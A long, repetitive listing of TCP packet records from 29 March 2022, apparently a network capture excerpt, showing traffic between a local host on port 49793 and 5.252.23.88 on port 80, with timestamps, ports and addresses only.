Mar 29, 2022 06:51:52.225745916 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225754976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225766897 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225788116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225792885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225799084 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225809097 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225827932 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225830078 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225851059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225872993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225881100 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225884914 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225893974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225915909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.225955009 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.225959063 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256148100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256175041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256195068 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256215096 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256244898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256253958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256262064 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256292105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256310940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256330013 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256350040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256367922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256376982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256386995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256401062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256406069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256406069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256426096 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256426096 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256443977 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256463051 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256479979 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256481886 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256484985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.256501913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:52.256784916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:52.259628057 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.135974884 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166328907 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166511059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166532993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166574955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166594028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166624069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166663885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166663885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166673899 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166712999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166731119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166773081 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166774988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166785955 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166793108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166811943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166811943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166851997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166863918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166892052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166918039 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.166953087 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.166992903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167005062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167016029 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167032957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167062044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167071104 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167071104 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167109966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167128086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167150021 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167186975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167191982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167201042 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167226076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167272091 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167275906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167282104 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167314053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167351961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167356014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167397022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167397976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167438984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.167452097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167460918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.167565107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197277069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197307110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197324991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197341919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197360039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197367907 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197377920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197391033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197396040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197413921 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197428942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197429895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197434902 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197446108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197463036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197478056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197489977 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197494030 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197495937 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197510958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197527885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197536945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197542906 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197545052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197561979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197577000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197592020 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197596073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197601080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197607040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197623014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197638988 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197648048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197653055 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197654963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197673082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197688103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197699070 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197705030 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197705984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197721004 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197736979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197752953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197763920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197768927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197768927 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197786093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197803020 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197813988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197818041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197819948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197834015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197849989 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197865009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197866917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197873116 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197880983 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197896957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197911978 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197922945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197927952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197930098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197942972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197962046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197964907 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197969913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.197977066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.197992086 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.198008060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.198014975 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.198020935 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.198023081 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.198039055 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.198054075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.198065996 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.198070049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.198360920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.227890968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.227931023 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.227945089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.227965117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.227968931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.227992058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228010893 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228015900 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228027105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228045940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228058100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228063107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228064060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228070021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228082895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228100061 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228105068 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228110075 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228126049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228133917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228147984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228151083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228176117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228188992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228200912 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228207111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228214979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228240967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228254080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228257895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228266001 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228281021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228286028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228308916 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228316069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228322029 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228332043 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228355885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228374004 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228379965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228379965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228406906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228423119 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228429079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228431940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228456020 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228476048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228481054 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228486061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228499889 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228503942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228532076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228554010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228566885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228573084 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228575945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228578091 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228600025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228607893 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228622913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228646040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228647947 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228652954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228667974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228699923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228705883 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228708029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228712082 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228729010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228754044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228770971 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228777885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228779078 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228801966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228826046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228832006 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228836060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228847980 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228869915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228890896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228894949 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228898048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228914976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228936911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228965044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228974104 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.228976965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.228979111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229000092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229023933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229042053 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229047060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229047060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229069948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229099035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229109049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229113102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229119062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229132891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229157925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229171991 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229182959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229206085 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229219913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229219913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229243994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229266882 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229279995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229289055 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229294062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229311943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229322910 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229336977 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229357958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229372025 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229387045 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229410887 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229434013 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229438066 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229444981 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229455948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229482889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229495049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229500055 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229506969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229535103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229553938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229557037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229559898 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229578018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229593992 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229597092 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229600906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229624033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229635000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229640007 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229645967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229669094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229680061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229685068 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229691029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229712009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229728937 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229734898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229737997 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229758024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229764938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229769945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229779005 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229794979 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229808092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229835033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229835987 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229841948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229856968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229880095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229902983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229903936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229907990 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229926109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229933023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229948044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229967117 CEST	49793	80	192.168.2.7	5.252.23.88
